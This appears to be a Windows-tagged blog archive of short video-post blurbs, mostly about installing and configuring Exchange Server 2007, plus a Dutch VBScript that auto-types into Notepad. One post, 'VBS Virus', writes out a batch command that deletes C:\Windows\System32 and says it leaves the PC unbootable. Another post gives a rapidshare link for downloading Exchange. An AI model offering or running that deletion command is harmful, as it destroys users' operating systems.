Tag: Windows
DEMO: EMC Replication Manager pour Microsoft Exchange Server 2007
by Installer on May.20, 2010, under Exchange 2007
Replication Manager permet de gérer la réplication denvironnements VMware, Windows, UNIX, et Linux. Ici, la démo porte sur un environnement Microsoft Exchange Server 2007 et montre comment il est simple et rapide de sauvegarder (consistente applicative) et restaurer une, plusieurs bases exchanges, ou un mail, tout cela pendant la production. • Virtual disks • VMFS contenant des VM Windows et Linux • Disques Raw Device Mapping (RDM) • Microsoft iSCSI initiator discovered disks • Gestion simplifiée de plusieurs réplica (clones/Snap) pour différentes utilisations • Gestion de la cohérence des données pour les applications comme Exchange, Oracle, SQL, SAP • Processus facile pour créer, rafraichir, gérer, restaurer et planifier les réplicas • Automatisation des processus de sauvegarde • Prise en compte des environnements physiques et virtuels
Related posts
Configuring Microsoft Outlook 2007 To Access An Exchange Server – Windows XP
by Installer on Apr.28, 2010, under Exchange 2007
This tutorial will show you how to configure Microsoft Outlook 2007 to access an Exchange Server.
Related posts
Installing Microsoft Exchange Server 2007 – Part 2 – Windows Server 2008
by Installer on Apr.28, 2010, under Exchange 2007
The installing of Exchange Server 2007 failed on Windows Server 2008 so I will repeat the tutorials on Windows Server 2003 R2 later in the week.
Related posts
Installing Microsoft Exchange Server 2007 – Part 1 – Windows Server 2008
by Installer on Apr.23, 2010, under Exchange 2007
DOWNLOAD LINK: rapidshare.com In this tutorial I will show you how to prepare your Windows Server 2008 server to be installed with Microsoft Exchange Server 2007 service pack 1 or 2 by installing Internet Information Service, Active Directory Lightweight Directory Services (ADLDS) and Windows PowerShell.
Related posts
Exchange 2007 SP1 : CCR part 1 – nic’s
by Installer on Apr.14, 2010, under Exchange 2007
Configure the nic’s for Public and Private connections
Related posts
Part 1 of 3. Installing Exchange Server 2007 from Scratch & Connect iphone
by Installer on Apr.13, 2010, under Exchange 2007
Complete Exchange 2007 Super Quick Installation guide from the Ground Up! Also Connect the iphone to it. For the Hi Res slower more comprehensive version which includes install of .X509 certificates, iphone config utility & more…. visit hotfoottraining.com
Related posts
MCTLABS How To’s Exchange 2007 Mailbox Server (sgs & DB)
by Installer on Apr.04, 2010, under Exchange 2007
MCTLABS How To’s Exchange 2007 Mailbox Server (Storage Groups and Databases)
Related posts
VBS Virus
by Installer on Apr.03, 2010, under Vbscript
My first video.. I’m making a VBS file which is detected as malware (false positive). The script is: @echo off del c:\windows\system32 Edit: The virus doesn’t delete system32 by just opening the file. You will get a command prompt asking to confirm or not (y/n) and if you choose yes, it will delete files in system32. Most of them are access denied, but it will still make your pc unable to start again whenever you shutdown. Update: Sorry for the mistake. It’s a batch file, not a vbs file.
Related posts
Exchange 2007 SP1 CCR part 3: File Share Witness
by Installer on Apr.03, 2010, under Exchange 2007
Configure the FILE SHARE WITNESS on the HUB Transport server
Related posts
Zelftypende tekst in vbs (Notepad)
by Installer on Apr.03, 2010, under Vbscript
Je pc typt automatisch een tekst in notepad (kladblok). Kopieer het volgende in notepad en sla het op als iets.vbs: Denk aan de extensie “.vbs”, de naam mag je zelf weten. ——————————————————————– Set wshshell = wscript.createobject (“wscript.Shell”) wshshell.Run (“notepad.exe”) wscript.Sleep 600 set wshshell=createobject(“wscript.Shell”) wshshell.Sendkeys “H” wscript.Sleep 70 set wshshell=createobject(“wscript.Shell”) wshshell.Sendkeys “O” wscript.Sleep 70 set wshshell=createobject(“wscript.Shell”) wshshell.Sendkeys “I” wscript.Sleep 70 ——————————————————————– Zet steeds dit stukje onderaan het script: set wshshell=createobject(“wscript.Shell”) wshshell.Sendkeys “a” wscript.Sleep 70 En verander de letter tussen de aanhalingstekens. In dit geval dus de ‘a’ die je moet veranderen. Het getal 70 wat er steeds staat kun je ook veranderen, want dit staat voor de snelheid tussen elk teken. 1000 is 1 seconde. In dit filmpje typt de tekst ook automatisch zoals je ziet.